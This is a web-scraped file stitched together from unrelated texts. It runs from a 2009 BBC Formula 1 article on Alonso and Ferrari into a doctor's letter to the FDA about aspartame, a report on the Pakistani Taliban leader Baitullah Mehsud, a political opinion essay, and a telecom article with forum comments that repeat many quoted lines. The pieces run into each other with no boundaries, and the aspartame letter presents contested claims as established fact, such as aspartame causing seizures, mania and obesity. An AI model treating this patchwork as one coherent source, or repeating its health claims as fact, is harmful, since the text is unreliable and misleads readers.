Venue : Valencia Dates : 21 - 23 August 2009 Coverage : Live coverage of Friday 's practice sessions , Saturday qualifying and Sunday 's race - which starts at 1300 BST - across BBC TV , radio and online platforms .
Find full listings here Two - time world champion Alonso is considered one of the most gifted F1 drivers
By Andrew Benson
BBC Sport in Valencia
Fernando Alonso will move from Renault to Ferrari next year and spark a cascade of other driver changes , according to McLaren team boss Martin Whitmarsh .
The double world champion 's expected switch is an open secret in Formula 1 , but Whitmarsh is the first senior figure publicly to acknowledge it .
" I think we all know that the Fernando - Ferrari move has a knock - on effect that ripples through the other teams , " he said .
Ferrari said Kimi Raikkonen and Felipe Massa were already contracted for 2010 .
" He ( Whitmarsh ) can say what he wants , there is no ' Fernando - Ferrari move ' , " said a spokesman for the Italian team .
" Things can happen and not happen .
But you cannot talk about any Fernando - Ferrari move .
We have two drivers with a contract until the end of 2010 .
We are not under pressure to change anything . "
In reality there are some changes probably with Fernando and Ferrari and that frees up the driver market
McLaren boss Martin Whitmarsh Alonso , who denied last month that he had signed a contract with Ferrari , has ducked questions about his future since arriving in Valencia for this weekend 's European Grand Prix .
Whitmarsh 's remarks were made in an interview with BBC Sport in which he addressed rumours that McLaren will replace Heikki Kovalainen with Nico Rosberg as Lewis Hamilton 's team - mate next year .
" At the moment we have not had , nor are we in , conversations with any other drivers and we will see in the future .
In reality , there are some changes probably with Fernando and Ferrari and that frees up the driver market , " he said .
" Every year there are a number of pivotal points during the season which determine what is going to happen in the drivers ' market .
" This year I think we all know that the Fernando - Ferrari move has a knock on and that ripples through the other teams .
" Clearly the BMW withdrawal will also have an impact .
" So I do n't think we see a need at the moment to rush into it .
I think we are concentrating on developing the car and making sure we are more competitive , which I think we will be this weekend .
" Heikki is pushing hard .
He is a driver who can drive the car very quickly - if you look at his fuel corrected qualifying times , he has been massively competitive .
" But he has n't performed quite as well as he - and we - would like him to in the races . "
Ferrari are reported to be planning to partner Alonso with Massa and are said to be in negotiations with Raikkonen 's management to pay off a proportion of the Finn 's 2010 contract before moving him on to another team .
Brawn , Renault and Toyota have all been linked with the 29 - year - old , who won the world championship in his first year with Ferrari in 2007 .
But the injury suffered by Massa at the Hungarian Grand Prix last month has complicated matters .
He is recovering from the fractured skull and damaged eye he sustained after he was hit on the helmet by a spring that had become detached from Rubens Barrichello 's Brawn , so there is some doubt about when and whether he will be able to make a full return to F1 .
In that context , Ferrari may wish to keep open the possibility of Raikkonen driving for the team in 2010 in the event that Massa fails to make a full recovery .
Massa , who is recuperating at home in Brazil , has targeted a return at his home Grand Prix on 18 October , and was visited last week by Ferrari team boss Stefano Domenicali .
606 : DEBATE
I think you can tell Kimi is done with F1 .
He was a great driver but appears to lack motivation after his WDC ...
alesi27
But the Ferrari spokesman said it was too early to predict any comeback by Massa .
" We are all happy Felipe is getting better and better every day .
But we are all - including Felipe - aware that we have to be patient .
" He is having another CT ( brain ) scan at the end of this month or the beginning of September and we will have a better picture after that .
" From the human point of view , he is already close to 100 % .
Then he has to complete a physical recovery process .
After that he will have to start again his physical preparation , because at the moment he cannot do anything ( about improving his fitness ) .
" At the moment we are all happy he is recovering so quickly .
We are pretty confident .
For him and everyone it would be a dream if he could race in Brazil .
" But we know we have to face the reality and the reality is to take it step by step . "
The driver market is wide open as F1 heads into its traditional ' silly season ' .
BMW 's decision to withdraw from F1 at the end of the season has put their two drivers Robert Kubica and Nick Heidfeld on the market .
Kubica , the more highly rated of the two , has been linked to a move to Williams in place of Rosberg on a one - year deal , but could also interest Brawn and Renault , who would need a top - liner to replace Alonso , assuming his move to Ferrari goes ahead .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Margaret Hamburg , M.D .
Commissioner , F.D.A .
5600 Fishers Lane
Rockville , Maryland 20857
Dear Dr. Hamburg :
I would like to urgently request that the F.D.A. re-visit the approval of aspartame .
This is an issue which I have been involved with for the past 25 years - initially because of the adverse effects experienced by one of my patients .
I had been treating a then 54 year old woman with imipramine because of recurrent major depressive episodes .
Previous psychoanalytically based therapy had proven ineffective , but she responded dramatically to 150 mg of imipramine per day .
She had done well for 11 years on this medication , but was then suddenly hospitalized with a grand mal seizure and subsequent manic episode .
One could postulate that she was bipolar and the imipramine had triggered the mania , but she had been on the same medication for a total of 11 years , and for the previous 5 years at the same 150 mg per day dose .
Neither the seizure nor her mania were consistent with what we know about the clinical course of bipolar disorder or epilepsy .
Careful history revealed that the only change in her life was a recent decision to switch from the sugar which she had always used to sweeten her iced tea to a newly marketed product with aspartame .
I reasoned that the aspartame could have altered the catecholamine / indoleamine balance and thus account for her clinical difficulties .
After the publication of this case report many patients with unexplained seizures or puzzling psychiatric presentations were referred to me .
I became increasingly convinced that aspartame could trigger seizure activity and mimic or exacerbate a variety of psychiatric disorders .
I presented a paper based on those patients at a 1987 MIT sponsored conference on dietary phenylalanine and brain function .
Industry sponsored criticism was made that my conclusions regarding aspartame 's toxicity could not be accepted as valid because my case reports were " merely anecdotal " and not based on double - blind research .
Although I personally believe that case reports are undervalued in modern medical literature , I was so convinced of aspartame 's toxicity , and the need to have it 's hazards more widely appreciated in the medical community , that I did undertake a double - blind study .
That study was published in Biological Psychiatry in 1993 ( a copy of the paper is enclosed ) .
It demonstrated that individuals with mood disorders are particularly sensitive to aspartame and experienced an accentuation of depression and multiple physical symptoms .
I had expected that the difficulties experienced by patients receiving aspartame would be fairly subtle ( the dose of 30mg / kg / day was well below the 50mg / kg / day that the F.D.A. considered " safe " ) .
I was not prepared for the severity of the reactions and for obvious ethical reasons cannot perform any further human studies with aspartame .
Two years after the publication of that study I was contacted by a producer for " 60 Minutes " and asked if I would be willing to be interviewed by Mike Wallace for a segment on aspartame .
During that interview
Mike challenged me on my assertion that there were major problems with this sweetener in view of the fact that the bulk of the medical literature attested to it 's safety .
I responded that one had to look carefully at study funding - that virtually all of the studies claiming safety were funded by the industry , whereas independently funded studies invariably identified one or more problems .
When he challenged me to prove this I prepared a chart correlating study outcome and funding source .
This chart was aired on the 60 Minutes segment , and is enclosed , with further discussion of this entire issue .
Although for obvious ethical reasons I cannot perform further human studies with aspartame , as a busy clinician I continue to see the multiple neurological and psychiatric consequences of aspartame use .
It can lower seizure threshold and lead to an incorrect diagnosis of epilepsy , with subsequent inappropriate prescription of anticonvulsants .
It can mimic or exacerbate symptoms of MS , it can paradoxically produce carbohydrate craving and weight gain .
The world - wide epidemic of obesity and type 2 diabetes obviously has multiple causes , but I am convinced aspartame is a major factor .
On a daily basis I see how it can both produce and aggravate depression , in certain patients it can trigger manic episodes , it can produce or aggravate panic attacks .
Some of my patients have experienced a complete cessation of panic attacks and needed no further treatment after they totally eliminated aspartame from their diet .
Certain schizophrenic patients have experienced fewer auditory hallucinations and needed less antipsychotic medication after the elimination of aspartame consumption .
Thank you Dr. Hamburg for your attention to this urgent public health problem .
Yours sincerely ,
Ralph G. Walton , M.D .
Former Professor and Chairman ,
Department of Psychiatry ,
Northeastern Ohio Universities College of Medicine
Baitullah Mehsud , the feared leader of the Pakistan Taliban , is believed to have been killed during the Aug. 5 airstrike in South Waziristan .
Faqir Mohammed , the deputy leader of the Movement of the Taliban in Pakistan and the commander of the Bajaur Taliban , told Sky News that Baitullah was killed in a strike that also killed Baitullah ’s second wife .
An aide to Baitullah identified as Kafayatullah , as well as another unidentified Taliban leader in South Waziristan , also said that Baitullah had been killed in the attack .
“ I confirm that Baitullah Mehsud and his wife died in the American missile attack in South Waziristan , ” Kafayatullah told the Associated Press late last night .
Baitullah was said to have been buried near the village of Nardusai .
“ Some who had reportedly seen his body said that it had been half - destroyed by the blast , ” the BBC stated .
Pakistan ’s Interior Minister , Rehman Malik , said intelligence believes that Baitullah was killed in Wednesday ’s strike but the government wants to confirm the reports .
US intelligence officials also believe that Baitullah was killed .
Reports indicate Baitullah was visiting a compound owned by Ikramuddin Mehsud , Baitullah ’s father - in - law , in the village of Zanghra in the mountains near Baitullah ’s home town of Makeen .
The airstrike also reportedly killed one Baitullah ’s two brothers and seven of Baitullah ’s bodyguards .
US intelligence sources contacted by The Long War Journal last evening had initially believed Baitullah survived the attack .
A search for Baitullah ’s successor
The Pakistani Taliban is reported to be meeting to appoint Baitullah ’s successor .
Possible successors to Baitullah include his cousins Hakeemullah Mehsud , Qari Hussain Mehsud , and Waliur Rahman , military commander Azmatullah Mehsud , and North Waziristan leader Hafiz Gul Bahadar .
Hakeemullah directs Taliban operations in Arakzai , Kurram , and Khyber .
He has been behind the attacks against NATO convoys moving through Peshawar .
More than 700 NATO vehicles and containers have been destroyed in these attacks over the past eight months .
Qari Hussain is a feared military commander in South Waziristan .
He is notorious for training children to become suicide bombers .
Hafiz Gul Bahadar is also a candidate to take over the Pakistani Taliban in the event of Baitullah ’s death .
Bahadar is widely respected in Taliban circles and has close links to the Taliban in Afghanistan as well as to al Qaeda .
Waliur Rahman is a cousin of Baitullah and serves as a deputy military commander in South Waziristan .
Azmatullah Mehsud is also a military leader in South Waziristan .
Background on Baitullah Mehsud , Pakistan ’s most powerful Taliban commander
Baitullah is the leader of the Tehrik - i- Taliban Pakistan , or the Movement of the Taliban in Pakistan , the unified command of scores of local Taliban fighters throughout the Northwest Frontier Province and the tribal areas abutting Afghanistan .
He has also allied with North Waziristan Taliban leader Hafiz Gul Bahadar and South Waziristan leader Mullah Nazir to form the Council of United Mujahideen .
The group has pledged its support to al Qaeda leader Osama bin Laden and overall Taliban commander Mullah Omar , and has vowed to battle the governments of Pakistan , Afghanistan , and the US .
Based out of South Waziristan , Baitullah has become the most prominent Taliban leader in Pakistan .
He commands tens of thousands of well - trained fighters , who conduct suicide and conventional attacks against Pakistani , Coalition , and Afghan forces .
Since 2004 , Baitullah ’s fighters have defeated the Pakistani Army in several engagements .
In January 2008 , the Pakistani Army agreed to a cease fire after abruptly ending an operation 10 days into a battle with Baitullah .
He has been implicated in the assassination of former Prime Minister Benazir Bhutto shortly after her return from exile in late 2007 .
Baitullah is closely allied with bin Laden and Mullah Omar .
Al Qaeda shelters in Baitullah ’s tribal areas and maintains scores of training camps and safe houses in the region .
Baitullah has openly stated his intentions to conduct attacks against the United States and the West .
He “ poses a clear threat to American persons and interests in the region , ” the State Department said earlier this year , when it offered up to $ 5 million dollars for information leading to his location or capture .
Bill Roggio is a Senior Fellow at the Foundation for Defense of Democracies and the Editor of FDD 's Long War Journal .
Are you a dedicated reader of FDD 's Long War Journal ?
Has our research benefitted you or your team over the years ?
Support our independent reporting and analysis today by considering a one - time or monthly donation .
Thanks for reading !
You can make a tax - deductible donation here .
Wingnuts Will Use Canceled F - 22 Raptor To Kill All the Gay People In America
So the all - rounder Andrew Symonds may not now play Test cricket again after being seen drinking beer at a State of Origin football match , something all adults are allowed to do .
Keith Miller could drink beer , punch spectators , roger the Royal Family and failed to turn up to training when hung - over but suffered no like fate .
Kevin Rudd and Malcolm Turnbull can publicly insult each other in vituperative personal terms in parliament and are acclaimed for it .
John Singleton can drink and curse and bust up furniture and still keeps his radio licence .
Alexander Downer can call the torture victim David Hicks a " trained killer " when he has done less harm than the average Kings Cross bouncer and not lose his parliamentary pension for it .
Why then is Andrew Symonds fined millions , publicly shamed and brought perhaps to the brink of suicide , or at the least self - harm , by a few loose words and some beers at a football match ?
One might think there is a racial component in it , but similar punishment was meted out to Shane Warne too , and Matthew Johns and , this week , Tony Zappia .
One might think it applies to sportsmen only , until John Brogden , Troy Buswell , Joe McDonald ( expelled by Rudd from the party for saying " I 'll be ba -a-ck ! " ) and Joel Fitzgibbon ( flew free to China , the beast ) come to mind .
One might think it applies to men only until one remembers Belinda Neal ( upbraided a waiter , it seems ) , and , a while back , Cheryl Kernot ( whose crime was to have had sex in her early 20s with a 19 - year - old male and thus lose her chance , and it seemed pretty big back then , of becoming Prime Minister ) .
And Jacqui Smith , whose husband spent 10 taxpayer pounds hiring a porn movie , a mortal sin , it seems .
Why is this happening ?
Why is this happening now ?
I call it the New Wowserism .
By its rules , some people are ruined forever by their minor breaches of etiquette while others bomb Gaza , upend the world economy , order the machete - killings of hundreds of thousands and manufacture cigarettes unpunished .
The first group commit no war crimes , or crimes , or misdemeanours , or mostly even sins , and yet are smashed in their careers and dispirited forever and their families shamed .
Why is it happening ?
And why is it happening now ?
Why , in 2007 and 2008 , has wowserism returned ?
One should ask here Lenin 's sharp question : Who whom ?
Who benefits ?
Who is making hay out of this persecution of the ill - kempt and grumpy celebrity ?
And one will come then , like Lenin , to an unsurprising answer : the high lords of greed in Wall Street and Newscorp , that 's who .
For the rulers of global capitalism have lately come to fear the jig is up .
They have been publicly proved to be not just environmentally toxic , and likely to end with their smoke and avarice the planet Earth , but economically toxic as well , and likely to bankrupt not just Iceland but Wall Street , and they need to take the heat off themselves , and beam it somewhere else .
And they 've turned up an adequate alternative target and scapegoat , the bad table manners of certain visible celebrities .
Sure , we 've ruined two hundred million lives , they say , and caused half a million suicides , but Jacqui Smith 's husband watches porn .
Sure we 've pumped filth into the atmosphere and ended four thousand species , but Troy Buswell sniffs chairs .
Sure , we 've bombed and killed eighty thousand children , and denied AIDS drugs to five million more , but Andrew Symonds once said something sharp to an umpire , and was seen drinking beer at a football match .
Go after him .
Go after him .
We 're entirely comfortable with our eight million dollars a year , our thirty dollars a minute day and night for the rest of our lives on the interest alone , and our fifty million dollar share portfolios in return for our worldwide toxic incompetence , go after Andrew , punish the golliwog , go after Joel , he 's friends with a Chinawoman , she paid his air fare once , go after the sporting hero and the politician , that 's the way it works .
Go after them .
They 're hiding their harm and greed , their vast harm and vast greed , under the lesser harm and the lesser greed of politicians and sportsmen .
And it's no accident that Gordon Brown , the principal architect of the renaissance , through re-nationalisation , of the social democracy that so scares the bejesus out of them , is the principal victim of this new wowserism in Britain .
He threatens capitalism itself , of course he does , but hey , that 's not why we 're after him .
We 're after him because his ministers are greedy .
Not him , his ministers .
That 's why he has to go .
The good guy has to go .
And though David Cameron is greedy too , look what he claimed in expenses , he has to stay .
the bad guy has to stay .
Makes perfect sense , does n't it ?
Elect the greedy one , and spifflicate the ungreedy one , because of the sin of greed .
Zounds ,
Hamlet said at a certain point , do you think I am easier to be played upon than a pipe ?
But we are , it seems .
We are .
Follow the thread , I beg you ..
Murdoch , who personally makes billions , and helped rig with his early call the 2000 US election and made billions more from the illegal wars that followed on his early call , is now pursuing Rudd for the use of a ute .
Channel Nine , which supported the War on Terror and the persecution of David Hicks , has illegally bugged Tony Zappia and ruined him for what , in a court of law , would get him a small fine .
Crimes against humanity do n't matter , the high lords of Wall Street and The Wall Street Journal say , but table manners do , and bad table manners - why would n't they ?
- merit professional destruction and the shattering of the lives of the children of the accused , the humiliation of their wives and parents , the despair of their teams and communities , the ending of chapters of history .
A breach of etiquette can be readily understood , a crime against the planet less so , a crime against the world 's economy not at all , it seems .
Am I drawing too long a bow here , as Annie my wife alleges ?
Not unless you agree that meltdown capitalism 's chief defender Rupert Murdoch has no power , no power at all , and no desire at all , to change the subject from Gordon Brown 's heroic rescue of Britain 's economy to the misuse of piddling sums of money , not by Gordon Brown but politicians in general .
Not unless you agree that the London Sun and the New York Post and the Herald Sun and Fox News are not in themselves misuses of power .
Not unless you think the torment of scores of millions of children who are dying for want of AIDS drugs is less important than someone slagging an umpire in the heat of a vital game , or sending an SMS to a girl in the crowd he fancies , a misdemeanour now punishable by professional extinction .
I spent a long night yarning and drinking with the sinful Keith Miller once , in 1988 , and found him a wonderful , various , intelligent , thoughtful man .
If he had been driven out of cricket in 1946 , when he first donged a spectator , his life would have been less inspiring , his art less acclaimed and his memories less crowded with glamorous delight .
And so would Australia 's memories .
And so as it turns out would mine .
How many future Symonds and Millers are being driven out by this corrupt , nit - picking targeted wowserism , I wonder , driven off the field of honour for good and all ?
How many Browns and Kernots and Fitzgibbons and Brogdens and Edwardses and Clintons and Kennedys and Martin Luther Kings discouraged from even considering taking part in public life ?
Just asking .
Consumers In U.S. , Canada Pay More For Wireless
Wireless industry respectfully requests that you ignore this
The latest OECD data suggests consumers in Canada , Spain and the United States pay the most for calls and text messages of all 30 ranked OECD nations .
Unlike Europe , callers in Canada and the US pay to receive messages -- but even factored in North American customers are paying considerably more than dozens of other countries .
On average , the OECD found that Americans pay $ 635.85 on cell phone service , compared to $ 131.44 per year in the Netherlands or $ 137.94 per year in Sweden .
The study highlights how prices have decreased 21 % for low - usage ( 360 calls per year , 390 SMS , 8 MMS ) consumers , 28 % for medium usage , and by about 32 % for high usage ( 1680 calls per year , 660 SMS ) consumers .
Still , a medium use customer in the United States ( 780 calls per year , 600 SMS , and eight MMS ) pays $ 53 a month for service , compared to $ 11 a month for service in the Netherlands .
As you might expect , the wireless industry issued a press release proclaiming the study was based on " flawed assumptions " that " just do n’t make sense . "
If you look at the data the way carriers would like , you 're getting quite the bargain .
The CTIA does have a point that the OECD 's usage categories seem low -- particularly when it comes to MMS use .
Another reason U.S. prices seem high ?
Carriers charge a hell of a lot of money for service .
They also spend millions on lobbyists who tirelessly work to eliminate consumer protections and price controls .
Carriers had a Carriers had a similar response when recently asked why exactly SMS prices have jumped 200 % in just two years despite the service costing virtually nothing to provide ( 160 byte data is already transferred via tower control channels ) .
Verizon went so far as to deny SMS prices had risen at all -- and that if consumers looked at the data the way Verizon would like , SMS prices have actually decreased .
How ?
By jacking up SMS prices , carriers got consumers to flock to bundle SMS packages ranging from $ 5 - $ 15 per month .
News Jump SpaceX Providing Internet To Towns Hit by Wildfires ; Verizon Launches New 5G Home Hardware In Twin Cities ; + more news Stark New Reality In The Telco Business : Dumb Pipes No Longer Cut It ; AT&T Unveils Mix and Match Plans ; + more news AT&T Extends Overage Charge Waiver ; Verizon And T - Mobile Each Insist Their 5G Strategy Is The Right One ; + more news War Of Words Heats Up : T - Mobile Fires Back At Verizon , AT&T ; Amazon Intros Gaming Service To Take On Stadia ; + more news Starlink 's Network Faces Huge Limitations ; AT&T Whines T - Mobile Merger Put Too Much Spectrum In One Place ; + more news WISPs Get CBRS Range As Great As Six Miles At 100 Mbps Speeds ; Windstream Officially Exits Bankruptcy ; + more news Charter Relaunches Free 60 - day Internet And Wi-Fi Offer ; NCTA : FCC Should Stick With 25/3 Speed Threshold ; + more news Comcast Shuts Off Internet for Subs Who Were Sold Service Illegally ; AT&T , Verizon Team To Stop T - Mobile 5G ; + more news California Defends Its Net Neutrality Law ; AT&T's Traffic Up 20 % Despite Data Traffic Actually Being Down ; + more news Are The Comcast - Charter X1 Talks Dead In The Water ? ; AT&T May Offer Phone Plans With Ads For Discounts ; + more news
----------------------
this week last week most discussed view :
topics flat nest
fifty nine
join:2002-09-25
Sussex , NJ fifty nine Member Calling party pays
In some countries the calling party pays more , sometimes much more when they call a mobile .
We do n't .
This could at least in part explain the reason why our wireless costs more .
Luminaris
join:2005 -12-01
Waterford , VA Luminaris Member Re : Calling party pays
This maybe true but still , the price difference per year is , astonishing to me .
BACONATOR26
Premium Member
join:2000-11-25
Nepean , ON BACONATOR26 to fifty nine
Premium Member to fifty nine
But also consider ( and it 's been a while since I 've looked at pricing over there ) but you also get more minutes for the same pricing as our plans in Canada , in many cases unlimited national mobile to mobile calling , cheaper long distance and much better roaming rates .
en102
Canadian , eh ?
join:2001-01-26
Valencia , CA en102 Member Re : Calling party pays Canada has a LOT of extra fees .
SAF , long distance , caller id , voicemail are all extras in Canada .
If I 'm not mistaken , in Canada , you pay long distance even on a received call .
US has a LARGE geographical area covered .
Most other countries are the size of a US state , and pay roaming through the nose ... in the US - its all bundled .
pnh102
Reptiles Are Cuddly And Pretty
Premium Member
join:2002-05-02
Mount Airy , MD pnh102 Premium Member Re : Calling party pays said by en102 :
If I 'm not mistaken , in Canada , you pay long distance even on a received call .
If I 'm not mistaken , in Canada , you pay long distance even on a received call .
said by en102 :
US has a LARGE geographical area covered .
Most other countries are the size of a US state , and pay roaming through the nose ... in the US - its all bundled .
US has a LARGE geographical area covered .
Most other countries are the size of a US state , and pay roaming through the nose ... in the US - its all bundled .
Oy ... the service I had from Bell Atlantic Mobile back in the mid-1990s was like that .
If I was outside of my local calling area I had some sort of inbound long distance per-minute fee tacked onto the call , and that was on top of roaming .
If I remember correctly there was also a " termination fee " for ever completed outbound call .
True .
Paying extra for roaming within the USA for domestic plans is almost unheard of these days .
Ignite
Premium Member
join:2004-03-18
UK Ignite to fifty nine
Premium Member to fifty nine
said by fifty nine :
In some countries the calling party pays more , sometimes much more when they call a mobile .
We do n't .
This could at least in part explain the reason why our wireless costs more .
In some countries the calling party pays more , sometimes much more when they call a mobile .
We do n't .
This could at least in part explain the reason why our wireless costs more .
Paying to receive probably does n't help .
You guys , err , take it both ways
Rob
Premium Member
join:2001-08-25
Miami , FL Rob Premium Member
All this money and still not the best networks ..
I could understand if Canada / U.S. consumers pay more for wireless while having the best networks in their respective countries , but foreign countries where it 's cheaper tend to have much more advance networks .
SpaethCo
Digital Plumber
MVM
join:2001-04-21
Minneapolis , MN 1 recommendation SpaethCo MVM
Re :
All this money and still not the best networks .. said by Rob :
I could understand if Canada / U.S. consumers pay more for wireless while having the best networks in their respective countries , but foreign countries where it 's cheaper tend to have much more advance networks .
I could understand if Canada / U.S. consumers pay more for wireless while having the best networks in their respective countries , but foreign countries where it 's cheaper tend to have much more advance networks .
We all want the best technology available , unless it means there might be something not aesthetically pleasing ( be it a VRAD cabinet or cell tower ) placed in my neighborhood .
Both the US and Canada have relatively low population density across the massive landmass they need to cover , and you also have the problem of " not in my back yard " zoning restricting the placement of infrastructure .
We all want the best technology available , unless it means there might be something not aesthetically pleasing ( be it a VRAD cabinet or cell tower ) placed in my neighborhood .
pnh102
Reptiles Are Cuddly And Pretty
Premium Member
join:2002-05-02
Mount Airy , MD pnh102 Premium Member Re :
All this money and still not the best networks .. said by SpaethCo :
Both the US and Canada have relatively low population density across the massive landmass they need to cover , and you also have the problem of " not in my back yard " zoning restricting the placement of infrastructure .
Both the US and Canada have relatively low population density across the massive landmass they need to cover , and you also have the problem of " not in my back yard " zoning restricting the placement of infrastructure .
People who are opposed to the placement of cell towers for any reason should be banned from ever having a cell phone .
I am not sure how much of a problem this NIMBY stupidity when it comes to cell phone towers is in Canada , but in the USA , I get sick and tired of people complaining about cell phone tower placement .
We allow for ugly utility poles to go up and down streets because we need to be able to get electricity , cable TV and conventional phone service from one place to another , what is the big deal about cell towers ?
People who are opposed to the placement of cell towers for any reason should be banned from ever having a cell phone .
DeathK
Premium Member
join:2002-06-16
Cincinnati , OH DeathK Premium Member Re :
All this money and still not the best networks .. said by SpaethCo :
We allow for ugly utility poles to go up and down streets because we need to be able to get electricity , cable TV and conventional phone service from one place to another , what is the big deal about cell towers ?
We allow for ugly utility poles to go up and down streets because we need to be able to get electricity , cable TV and conventional phone service from one place to another , what is the big deal about cell towers ?
Personally I do n't give a damn .
Give me better service .
People have grown up with all their lives with telephone poles running along roads everywhere .
They 're used to it .
Having a cell tower pop up where there never used to be one is a scary propositionPersonally I do n't give a damn .
Give me better service .
pnh102
Reptiles Are Cuddly And Pretty
Premium Member
join:2002-05-02
Mount Airy , MD pnh102 Premium Member Re :
All this money and still not the best networks .. said by DeathK :
Personally I do n't give a damn .
Give me better service .
Personally I do n't give a damn .
Give me better service .
These must be the world 's most pathetic people .
Who even notices a cell tower ?
No kidding .
I 'll let any cell company that wants to rent property from me to build a tower do it .
These must be the world 's most pathetic people .
Who even notices a cell tower ?
nixen
Rockin ' the Boxen
Premium Member
join:2002-10-04
Alexandria , VA nixen to DeathK
Premium Member to DeathK
said by DeathK :
People have grown up with all their lives with telephone poles running along roads everywhere .
They 're used to it .
Having a cell tower pop up where there never used to be one is a scary proposition
Personally I do n't give a damn .
Give me better service .
People have grown up with all their lives with telephone poles running along roads everywhere .
They 're used to it .
Having a cell tower pop up where there never used to be one is a scary propositionPersonally I do n't give a damn .
Give me better service .
People used to grow up with different " telephone " poles for each pole - user ( competing telephone providers each had their own , as did power companies ) .
It was an aesthetic nightmare that was solved by making the various utilities share poles ( and , in some locations , running all wired utilities underground ) .
Some of the cell - phone mess might be solved by putting small cell pads on the currently existing poles in much the same way that they put them on the upper parts of buildings .
Skippy25
join:2000-09-13
Hazelwood , MO 1 recommendation Skippy25 to SpaethCo
Member to SpaethCo
Here we go ..... when ever our country looks bad compared to the rest of the world and we can't logically justify it lets through out the " we are really big and dispersed " argument that makes it seem like everything is OK here .
DaCheetah
@usyd.edu.au DaCheetah Anon Re :
All this money and still not the best networks ..
Agreed , it 's a poor excuse .
The US has ~ 10 times the population density of Australia , and last I checked we ( Australians ) pay less for SMS messages .
( We pay slightly more to send them , but nothing , not a cent , to receive them , unless they are " premium SMS " messages like the $ 10 / month horror - scopes that are a total waste of time and money )
This also does n't take into account that most people here are on " cap " plans , where as long as you do n't go over the " included credit " you only pay about a quarter of the total you " spend " , making the ~ $ 0.20 SMS more like 5c ( Which would be about 4c US at the moment )
These plans also often have ~ 150 free SMS messages per month and ~ 100 hours of free talk time to others on the same network .
sonicmerlin
join:2009-05-24
Cleveland , OH sonicmerlin to SpaethCo
Member to SpaethCo
said by SpaethCo :
said by Rob :
I could understand if Canada / U.S. consumers pay more for wireless while having the best networks in their respective countries , but foreign countries where it 's cheaper tend to have much more advance networks .
I could understand if Canada / U.S. consumers pay more for wireless while having the best networks in their respective countries , but foreign countries where it 's cheaper tend to have much more advance networks .
We all want the best technology available , unless it means there might be something not aesthetically pleasing ( be it a VRAD cabinet or cell tower ) placed in my neighborhood .
Both the US and Canada have relatively low population density across the massive landmass they need to cover , and you also have the problem of " not in my back yard " zoning restricting the placement of infrastructure .
We all want the best technology available , unless it means there might be something not aesthetically pleasing ( be it a VRAD cabinet or cell tower ) placed in my neighborhood .
Uh , here in central Europe ( Austria ) I 'm paying EUR 19.50 per month for virtually unlimited voice and data ( 1000 min / month and 3GB / month , both of which I can never reach ) .
Something is seriously wrong over there on your side .
Well , actually the big chunk of Austria are thinly populated mountains .
According to the CIA factbook , ~ 15 % of the land is arable ( which probably includes also the mountain farmers that are basically surviving on EU subsidies ) .
Same source : urban population : 67 % of total population ( 2008 )
Now all GSM / UMTS licenses include a rule that forces the mobile carriers to offer service to over 90 % ( not sure about the exact values , they might even vary depending upon the license ) of the population , so not offering the mountain population service is not an option .
That 's probably more painful to some than others , e.g. 3 ( drei.at ) has no GSM license , so they have to fulfill their service requirements via UMTS that tend to need more base stations .
Allow me to quote someone whose experience disputes your claims : Uh , here in central Europe ( Austria ) I 'm paying EUR 19.50 per month for virtually unlimited voice and data ( 1000 min / month and 3GB / month , both of which I can never reach ) .
Something is seriously wrong over there on your side .
Well , actually the big chunk of Austria are thinly populated mountains .
According to the CIA factbook , ~ 15 % of the land is arable ( which probably includes also the mountain farmers that are basically surviving on EU subsidies ) .
Same source : urban population : 67 % of total population ( 2008 ) Now all GSM / UMTS licenses include a rule that forces the mobile carriers to offer service to over 90 % ( not sure about the exact values , they might even vary depending upon the license ) of the population , so not offering the mountain population service is not an option .
That 's probably more painful to some than others , e.g. 3 ( drei.at ) has no GSM license , so they have to fulfill their service requirements via UMTS that tend to need more base stations .
nixen
Rockin ' the Boxen
Premium Member
join:2002-10-04
Alexandria , VA nixen Premium Member Re :
All this money and still not the best networks ..
Also , I do n't really recall the SIM card I got for my BlackBerry costing me for out - of - country roaming when I called from outside Germany ( e.g. , while driving through Belgium or Amsterdam ) .
Granted , it was a few months ago , so I do n't have the usage bill in front of me .
Maybe it did , I just do n't recall precipitous fund drains happening when traveling outside Germany with my German SIM .
Uncle Remus
@shawcable.net Uncle Remus Anon Re :
All this money and still not the best networks .. re : Bertrand Russell
How true that is !
Parogadi
What ?
Stop Looking At Me Like That
Premium Member
join:2003-03-31
Racine , WI Parogadi to SpaethCo
Premium Member to SpaethCo
Oh not that same lame tired ass argument again , how long did it take them to wire up 3G in most of the normal sized cities in the US ?
the population density can't be that much lower then most small cities around the world , I 'll give you back woods Nebraska , but it should take 5 years to cover the decent sized cities .
Same thing with their cherry picking of internet speeds .
If they can run phone power , water , cable and sewage they can put up a cell tower ...
WernerSchutz
join:2009-08-04
Sugar Land , TX WernerSchutz to Rob
Member to Rob
said by Rob :
I could understand if Canada / U.S. consumers pay more for wireless while having the best networks in their respective countries , but foreign countries where it 's cheaper tend to have much more advance networks .
I could understand if Canada / U.S. consumers pay more for wireless while having the best networks in their respective countries , but foreign countries where it 's cheaper tend to have much more advance networks .
Same as with Internet access via , say , cable .
Poor service / high price .
Same politics used to rip off the customer .
jmn1207
Premium Member
join:2000-07-19
Sterling , VA 1 recommendation jmn1207 Premium Member How Much For That Phone In The Window ?
Sure we pay more , but how is it compared when you throw in the price of the phones ?
We often see higher priced plans because the phone 's cost is being subsidized by them .
Also , my plan covers a significant area .
A plan that covers most of Europe would have to be considered to be comparable , not just individual countries like the Netherlands .
I could probably find a cheaper plan if it only covered an area the size of Maryland .
Yes , Europe tends to have more advanced communications , and their trains rock , but the numbers are n't as far off as it might seem .
What about taxes ?
Have any taxes been added to the cost of these plans ?
Some of these countries have taken a lot of money from their people to finance the infrastructure .
This cost would also have to be included to the overall price being paid for service .
Find me a total percentage of a person 's income spent to support their wireless service after everything has been more accurately calculated , and then we might have a comparison that is useful and fair .
sonicmerlin
join:2009-05-24
Cleveland , OH sonicmerlin Member Re : How Much For That Phone In The Window ? said by jmn1207 :
Sure we pay more , but how is it compared when you throw in the price of the phones ?
We often see higher priced plans because the phone 's cost is being subsidized by them .
Also , my plan covers a significant area .
A plan that covers most of Europe would have to be considered to be comparable , not just individual countries like the Netherlands .
I could probably find a cheaper plan if it only covered an area the size of Maryland .
Yes , Europe tends to have more advanced communications , and their trains rock , but the numbers are n't as far off as it might seem .
What about taxes ?
Have any taxes been added to the cost of these plans ?
Some of these countries have taken a lot of money from their people to finance the infrastructure .
This cost would also have to be included to the overall price being paid for service .
